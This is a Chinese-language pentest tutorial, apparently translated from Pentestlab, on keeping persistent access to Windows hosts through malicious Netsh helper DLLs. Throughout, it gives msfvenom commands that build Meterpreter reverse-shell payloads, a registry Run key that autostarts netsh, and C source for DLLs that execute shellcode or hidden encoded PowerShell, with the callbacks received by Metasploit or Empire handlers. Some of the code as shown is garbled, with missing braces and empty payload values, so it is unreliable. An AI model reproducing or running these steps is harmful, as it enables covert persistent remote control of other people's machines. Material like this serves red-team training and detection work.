
可以通过Metasploit Framework 的“ msfvenom ”实用程序生成任意DLL文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > /tmp/pentestlab.dll

“添加帮手”可以用来注册用的DLL “netsh的 ”实用工具。

add helper path-to-malicious-dll

 Netsh Helper DLL – Meterpreter

但是,默认情况下,netsh没有计划自动启动。创建将在Windows启动期间执行实用程序的注册表项将在主机上创建持久性。这可以直接从Meterpreter会话或Windows Shell中完成。

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh"
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh'

击败一家总部位于荷兰的IT安全公司,该公司率先在其Github存储库中发布概念证明DLL 。DLL是由Marc Smeets用C编写的,可以对其进行修改以包含自定义的shellcode。Metasploit Framework实用程序“ msfvenom ”可用于生成各种语言的shellcode。

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp -b '\x00' -f c

 C Shellcode – Netsh

可以将生成的shellcode注入到Netsh Helper DLL代码中。

#include <stdio.h>
#include <windows.h> // only required if you want to pop calc

#ifdef _M_X64
unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb";

// Start a separate thread so netsh remains useful.
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
    LPVOID newMemory;
    HANDLE currentProcess;
    SIZE_T bytesWritten;
    BOOL didWeCopy = FALSE;
    // Get the current process handle 
    currentProcess = GetCurrentProcess();
    // Allocate memory with Read+Write+Execute permissions 
    newMemory = VirtualAllocEx(currentProcess, NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (newMemory == NULL)
        return -1;
    // Copy the shellcode into the memory we just created 
    didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&buf, sizeof(buf), &bytesWritten);
    if (!didWeCopy)
        return -2;
    // Yay! Let's run our shellcode! 
    return 1;

// define the DLL handler 'InitHelpderDll' as required by netsh.
// See
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
    //make a thread handler, start the function as a thread, and close the handler 
    HANDLE threadHandle;
    threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
    // simple testing by starting calculator
    system ("start calc");

    // return NO_ERROR is required. Here we are doing it the nasty way
    return 0;

与上述方法类似,rtcrowley在他的Github存储库中发布了该方法的PowerShell版本。以下代码可用于执行PowerShell Base64编码的有效负载,并支持两个选项。

#include <stdio.h>
#include <windows.h>

DWORD WINAPI YahSure(LPVOID lpParameter)
    //Option 1: Quick and simple. Opens 1 PS proc & briefly displays window. Set payload to b64 unicode.
    system("start C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -win hidden -nonI -nopro -enc \

    //Option 2: Execute loaded b64 into a reg key value. Will spin up a few etra procs, but will not open an extra window.
    //system("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c \
            $x=((gp HKLM:SOFTWARE\\Microsoft\\Notepad debug).debug); \
                powershell -nopro -enc $x 2> nul");
    return 1;


//Custom netsh helper format
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
    HANDLE hand;
    hand = CreateThread(NULL, 0, YahSure, NULL, 0, NULL);

    return NO_ERROR;

 Netsh Helper DLL – PowerShell方法

执行“ netsh ”实用程序并使用“ add helper ”命令加载系统中的两个DLL都将执行集成的有效负载。

add helper C:\Users\pentestlab\Desktop\NetshHelperBeacon.dll
add helper C:\Users\pentestlab\Desktop\NetshPowerShell.dll

Empire和Metasploit的“ multi / handler ”模块可用于接收来自两个DLL的通信。

Netsh助手DLL PowerShell

 Netsh助手DLL Meterpreter

当执行“ 添加帮助程序 ”命令以加载DLL文件时,将在以下位置创建注册表项。


应该注意的是,某些可能安装在受感染系统上的VPN客户端可能会自动“ netsh ” 启动,因此可能不需要使用其他方法进行持久化。
